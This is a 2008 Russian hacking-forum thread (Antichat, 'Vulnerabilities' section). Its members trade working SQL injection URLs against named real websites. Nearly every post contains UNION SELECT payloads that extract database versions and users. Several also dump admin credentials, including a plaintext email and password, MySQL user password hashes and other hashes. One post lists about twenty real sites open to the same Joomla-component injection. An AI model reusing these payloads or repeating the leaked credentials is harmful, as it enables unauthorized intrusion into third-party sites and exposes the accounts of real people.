ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4551  
Старый 19.01.2008, 21:12
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://nipponm.ru/carcard.html?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*

4.1.22-log/nipponm9_base/nipponm9_nipponm@localhost
-----------------------------------------------------------------------------

http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

4.1.20/bgu/admin@localhost


http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,email,password), 4,5,6,7+from+users+limit+0,1/*

мейл/пароль
admin@brgu.ru/rbkkth100979
 
Ответить с цитированием

  #4552  
Старый 20.01.2008, 04:25
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Прикольный вывод инфы - нада вбить адресс после перехода - в след. адресе будет инфа
я пока первый раз с таким встретился ))
Цитата:
http://www.newdesign.ru/?pageId=-14+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3, 4,5,6,7,8,9,0,1/*
5.0.44-log
таблы
Sites
Prop
Extensions
Content
Companys
-----------------------------------------------------
Цитата:
http://www.mirtour.ru/order_prop.php?id=-191+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
5.0.45-log
ничо путного не достал
только в табле passwds есть password - 12345 - но от чего он не понять ((
 
Ответить с цитированием

  #4553  
Старый 20.01.2008, 16:51
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

PostgreSQL
bpla.org
Код HTML:
http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,VERSION(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061
Version() - PostgreSQL 7.2.1 on i686-pc-linux-gnu, compiled by GCC 2.96
Код HTML:
http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,USER,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061
USER - bpla
zz-soft.com.pl
Код HTML:
http://www.zz-soft.com.pl/kolo/index.php?action=1&idkat=-21+union+select+0,concat(USER(),0x3a,DATABASE(),0x3a,VERSION()),2/*
USER:zdrojek_kolo@localhost
VERSION:4.1.22-standard-log
DATABASE:zdrojek_kolo
 
Ответить с цитированием

  #4554  
Старый 21.01.2008, 02:27
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

Любителям футбола посвящяется
Цитата:
_http://fctavriya.org.ua/cgi-bin/news-details.cgi?newsid=-469+union+select+1,2,log in,4,pas,6,7+from+users+where+id=1/*
 
Ответить с цитированием

  #4555  
Старый 21.01.2008, 20:03
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.ziaruldebacau.ro/index.php?rubrica=9+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/*
4.1.22-standard-log
ziarul_iulian@localhost
ziarul_dbziar


Код HTML:
http://www.superlink.ro/index.php?id=-9999+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14/*
4.1.20-max-log
felici1_slink@76.162.254.212
felici1_slink

Код HTML:
http://www.pnl.ro/index.php?id=pers&user=99999+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
4.1.20
web@localhost
Project_K

Последний раз редактировалось WuWu; 21.01.2008 в 20:34..
 
Ответить с цитированием

  #4556  
Старый 21.01.2008, 21:01
ViniK
Новичок
Регистрация: 02.11.2007
Сообщений: 1
Провел на форуме:
32850

Репутация: 10
По умолчанию

http://www.paintball.ru/next.php?id=99999+union+select+0,1,concat_ws(0x3a, version(),user(),database())/*
Я нешарю пока нихера но потихой начинаю понимать....
 
Ответить с цитированием

  #4557  
Старый 22.01.2008, 00:42
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://job.pl.ua/search.php?searchtype=browse&whatlooking=vacancies&category=9999+union+select+1,2,username,userpass+from+poll_user/*
5.0.45-community-log
jobplu_admin@localhost
jobplu_base

admin/6512bd43d9caa6e02c990b0a82652dca
Код HTML:
http://www.theoneminutesjr.org/index.php?thisarticle=-9999+union+Select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15/*
4.1.22-log
root@localhost
mmmcms

Martin/zYjNDfJ0HwyS хеш походу, я несмог с ним справиться... как пасворд он не подходит
админка: /admin
Код HTML:
http://www.degrotegriepmeting.nl/public/index.php?thisarticle=999+union+select+1,2,3,4,concat_ws(0x3a,database(),user(),version()),6,7,8,9,10,11,12,13,14/*
5.0.30-Debian_0.dotdeb.1-log
griepmeting@mysql01.cambrium.nl
griepmeting

Код HTML:
http://www.park.nl/park_cms/public/index.php?thisarticle=9999+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15/*

4.0.13-log
root@localhost
park_cms

Последний раз редактировалось WuWu; 22.01.2008 в 14:13..
 
Ответить с цитированием

  #4558  
Старый 22.01.2008, 18:42
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://www.mycaraudio.ru/newsdesk_info.php/newsdesk_id/58'%20and%20lower(substring(version(),1,1))='5
 
Ответить с цитированием

  #4559  
Старый 23.01.2008, 13:10
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

adage.com
Код:
http://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7,8,9,10/*
4.1.15-emic-2.7.1-121-log:adage:adage@localhost

mysql.user:
Код:
http://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x71),0x71),4,5,6,7,8,9,10+from+mysql.user+limit+4,1/*
юзвери:
Код:
adageUser:5055955979f4e1e0
adage:*B26CE55D7330CED56ACCD1CFA9D8A18344CDC32F
root:*279E41BB816D40095DDA8AE1DDC59D42368BF351
trey:*427043D0F35CC5CFD50953AE7679EC4F0D458B99
circ:*FFDFE4D7155A660913C5CCB6AB6C20CA0C399AB8

Последний раз редактировалось fRg; 23.01.2008 в 15:15..
 
Ответить с цитированием

  #4560  
Старый 23.01.2008, 15:30
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Код:
http://www.hetelfde.nl/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.touring-england.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.greeknaturism.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.contra.lv/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://pdvguate.org/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://test.freedom-ru.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://degjomuzike.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://jco.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.animeaz.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.alternov.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://modeshape.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://justchum.com/game/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://zoorb.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://elmicom.com/zabava/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://myniteclub.com.au/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://lars.lischer.name/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.dijaki.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.bljesak.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://educatic.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://vanb.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://darknight.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ